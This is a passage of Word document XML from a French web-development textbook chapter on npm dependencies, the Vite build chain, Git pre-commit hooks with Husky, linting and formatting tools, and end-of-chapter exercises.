            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nécessaires à l'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Livrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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devDependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Outils de développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Non livrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes, quatre usages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npm install          # installe et met à jour le verrou</w:t>
        <w:br/>
        <w:t>npm ci               # installe exactement le verrou (CI)</w:t>
        <w:br/>
        <w:t>npm install -D vite  # dépendance de développement</w:t>
        <w:br/>
        <w:t>npm run build        # exécute le script "build"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et installe la version exacte du verrou. C'est la commande à utiliser dans une intégration continue, jamais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>35.4 Chaîne de construction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur ne comprend que HTML, CSS et JavaScript. La chaîne de construction transforme les sources : assemblage des modules, minification, optimisation des images, empreinte dans les noms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration courte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vite.config.js</w:t>
        <w:br/>
        <w:t>import { defineConfig } from "vite";</w:t>
        <w:br/>
        <w:br/>
        <w:t>export default defineConfig({</w:t>
        <w:br/>
        <w:t xml:space="preserve">  root: "src",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  build: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    outDir: "../dist",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    emptyOutDir: true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sourcemap: true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    assetsInlineLimit: 4096,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  server: { port: 8080, open: true },</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.113 — Quatre étapes, quatre rôles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51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Étape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="325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Entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="325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Sortie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Développement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serveur avec rechargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Fichiers optimisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Prévisualisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fichiers construits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serveur local de contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Fichiers construits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Site en ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ce que contient un dossier construit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Ne jamais déployer les sources de développement</w:t>
        <w:br/>
        <w:t>dist/</w:t>
        <w:br/>
        <w:t>├── index.html</w:t>
        <w:br/>
        <w:t>├── assets/</w:t>
        <w:br/>
        <w:t>│   ├── index-3f2a91.js      # empreinte : cache long</w:t>
        <w:br/>
        <w:t>│   └── index-8b41cd.css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>35.5 Automatiser les vérifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un crochet Git exécute un contrôle avant chaque commit ou chaque envoi. C'est le moment le moins coûteux pour attraper une erreur de format ou un test cassé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications avant chaque commit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.husky/pre-commit</w:t>
        <w:br/>
        <w:t>npm run lint</w:t>
        <w:br/>
        <w:t>npm run test -- --run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.114 — Cinq outils d'hygiène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43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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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27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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ESLint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs et style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>eslint.config.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Prettier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Formatage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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.prettierrc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EditorConfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Indentation et fins de ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.editorconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Stylelint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Qualité CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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.stylelintrc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Husky</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Crochets Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.husky/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un socle commun à toute l'équipe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.editorconfig</w:t>
        <w:br/>
        <w:t>root = true</w:t>
        <w:br/>
        <w:br/>
        <w:t>[*]</w:t>
        <w:br/>
        <w:t>charset = utf-8</w:t>
        <w:br/>
        <w:t>indent_style = space</w:t>
        <w:br/>
        <w:t>indent_size = 2</w:t>
        <w:br/>
        <w:t>end_of_line = lf</w:t>
        <w:br/>
        <w:t>insert_final_newline = true</w:t>
        <w:br/>
        <w:t>trim_trailing_whitespace = true</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AVANT CHAQUE ENVOI</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git status</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : ai-je préparé les bons fichiers ?</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git diff --staged</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le contenu est-il conforme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 message décrit-il le pourquoi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Les tests et le lint passent-ils ?</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Git enregistre des instantanés en trois zones.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message de commit explique le pourquoi.</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fichiers générés et les secrets ne se versionnent jamais.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fichier de verrouillage garantit une installation reproductible.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npm ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> installe exactement le verrou.</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construction produit des fichiers optimisés et versionnés par empreinte.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crochets Git attrapent les erreurs au bon moment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tous les outils sont en place. Le dernier chapitre assemble le tout dans un projet complet, de la première ligne à la mise en ligne.</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35.1 — Écrire un historique lisible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Trois modifications sont mélangées dans le répertoire de travail.</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Séparez en trois commits cohérents.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Rédigez un message pour chacun.</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 xml:space="preserve">Vérifiez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 35.2 — Configurer un projet</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 xml:space="preserve">Créez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et un script de vérification.</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 xml:space="preserve">Déclarez les scripts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
